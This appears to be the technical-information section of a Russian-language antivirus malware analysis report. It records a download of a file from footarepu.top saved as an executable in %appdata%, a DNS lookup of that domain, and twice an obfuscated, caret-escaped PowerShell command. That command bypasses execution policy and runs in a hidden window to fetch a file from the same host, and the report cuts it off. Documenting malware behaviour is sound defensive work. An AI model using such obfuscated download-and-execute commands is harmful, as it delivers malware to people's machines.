Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^WERShEL^L^.E^xE ^-^ex^ec^uT^iO^npOLIcY BY^p^ass ^-n^OpRo^f^iL^e^ -^wI^nD^owstY^lE hiDDe^n (ne^W-^oBj^ecT^ Sy^Ste^M^.neT^.w^eB^c^l^i^ENt)^.dOwN^lOA^DfILE('http://footarepu.t...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "P^o^WERShEL^L^.E^xE ^-^ex^ec^uT^iO^npOLIcY BY^p^ass ^-n^OpRo^f^iL^e^ -^wI^nD^owstY^lE hiDDe^n (ne^W-^oBj^ecT^ Sy^Ste^M^.neT^.w^eB^c^l^i^ENt)^.dOwN^lOA^DfILE('http://footarepu.t...' (со скрытым окном)